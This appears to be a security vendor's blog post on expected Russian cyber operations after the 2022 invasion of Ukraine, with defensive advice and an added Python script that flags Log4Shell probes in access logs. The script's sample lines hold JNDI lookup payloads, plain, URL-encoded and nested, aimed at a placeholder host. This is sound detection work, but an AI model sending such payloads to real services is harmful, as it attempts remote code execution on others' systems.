The predicted invasion of Ukraine by Russian forces has begun, and with it, the risk of cyber warfare against Ukraine's supporters has escalated. In the run-up to the invasion, Russia deployed offensive cyber operations against Ukrainian Government websites and infrastructure. With the invasion now fully underway, an escalation of cyberattacks is expected to include critical Western infrastructure, banks, hospitals, and other high-value targets.
In addition to Russian state-sponsored operations against their opponents, we expect cybercriminal enterprises in Russia to be given the green light to escalate their operations against Western countries with a suggestion that the Russian state will turn a blind eye to their activities.
The Nature of Russian State-Sponsored Attacks
Most planned attacks arrive with volumetric and nuisance threats—as in the "shock and awe" tactic we're seeing via the onslaught of DDoS attacks. However, these threats often provide air cover while attackers lay the groundwork for the main event. Organizations should assume that once a fast-and-furious attack dies down, a far more destructive attack is in the works.
While it is difficult to predict how any attack will be carried out, past attacks lead us to expect that some known trends will persist:
- Phishing is a likely initial access vector. Over 36% of all attacks begin with a compromise resulting from a successful phish.
- Log4Shell is a likely vector for exploit. Russian APT Primitive Bear/Gamaredon has been targeting Ukraine, and they are known to be actively exploiting Log4Shell vulnerabilities.
- Supply-chain based attacks should be expected. These include both attacks that use vulnerabilities (such as Log4j) in open-source libraries baked into software and attacks hidden in the updates of software that is providing critical business services—such as IT management software providers like Kaseya.
Because of the risk of phishing, vulnerability exploits, and supply chain attacks, defenders should stay on guard and focus on the midgame: the phase in which the attacker pivots through your infrastructure and takes actions that can alert your team to the intrusion, including command-and-control communications, data staging, and lateral movement.
Steps for Proactive Resilience
To help organizations build resilience against incoming cyberattacks, the Cybersecurity and Infrastructure Security Agency (CISA) published Shields Up guidance for all US-based organizations, and the National Cyber Security Centre (NCSC) published a list of actions to take when the cyber threat is heightened, aimed at UK-based organizations. All organizations should read either the Shields Up guide or the NCSC actions for specific proactive measures to prepare for the elevated risk that is likely to persist for the duration of the Russian military action.
To prevent initial intrusions, the defensive focus of all organizations should be on treating incoming electronic communications with skepticism, including scanning attachments. In addition, backups should be current and working, and restores should be tested. To reduce your attack surface, ensure that your critical systems are all at the latest patch levels and that commonly exploited vulnerabilities, including Log4Shell, are remediated. Finally, double-check that your supply chain and outsourced operations have also taken steps to protect you. If possible, institute more robust third-party vendor assessment criteria for any critical SaaS applications.
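Remediating Log4Shell should be paired with a check of whether exposed services were probed before the patch landed. The following is an added example, not code from the original post or from ExtraHop, that scans constructed Apache-style access log lines for the Log4Shell lookup string, catching URL-encoded and nested-lookup variants that a plain substring match would miss; the log lines, source addresses and hostnames are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined format. Hostnames use the
# reserved ".invalid" TLD; nothing here comes from the original post.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Feb/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [24/Feb/2022:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.7 - - [24/Feb/2022:10:01:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.8 - - [24/Feb/2022:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://example.invalid/c}"',
    '203.0.113.9 - - [24/Feb/2022:10:01:06 +0000] "GET /docs HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# The canonical lookup string, case-insensitive, tolerant of stray whitespace.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A ${...} lookup nested inside another one: legitimate requests almost never
# carry this, so it is worth flagging even when "jndi" itself is not visible.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def normalize(text, rounds=3):
    """URL-decode repeatedly (bounded) so encoded probes are compared in plain form."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(line):
    """Return 'jndi-lookup', 'nested-lookup' or None for one log line."""
    text = normalize(line)
    if JNDI_LOOKUP.search(text):
        return "jndi-lookup"
    if NESTED_LOOKUP.search(text):
        return "nested-lookup"
    return None


def scan_log(lines):
    """Return (1-based line number, category, source IP) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        category = classify(line)
        if category:
            hits.append((number, category, line.split(" ", 1)[0]))
    return hits


if __name__ == "__main__":
    for number, category, src in scan_log(SAMPLE_LOG):
        print(f"line {number}: {category} from {src}")
```

A hit only shows that a probe reached the service; pair it with the source address and timestamp to check for follow-on outbound LDAP or HTTP connections from the affected host.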
We also recommend specific common-sense steps organizations should be considering and communicating to their staff:
- Ask employees to not click on links they don't absolutely have to click on.
- Ask all employees to avoid going to any sites they don't have to for business purposes.
- Consider bringing people back into the office to reduce the attack surface created by de-perimeterization.
Even with the best user education, phishing attempts are still likely to succeed. To further protect your data:
- Universally implement multi-factor authentication (MFA).
- Use a robust identity and access management/governance (IAM/IAG) tool with MFA to manage access.
To reduce the risk of supply chain compromise through employee-owned devices:
- If your organization allows personally owned devices to connect to the network or any corporate cloud assets, remove any non-business-essential apps from those devices, especially social media and gaming.
Finally, because Russian APTs are known for using tactics that evade perimeter defenses, organizations should stay vigilant and use a layered security approach, including endpoint detection, network monitoring, and secure decryption to look for signs of initial and post-compromise activity.
If you're an ExtraHop customer, a Threat Briefing is available in Reveal(x). Watch this short video for an overview of what to look out for, and how Reveal(x) detections can support CISA's Shields Up guidance and detect signs of compromise.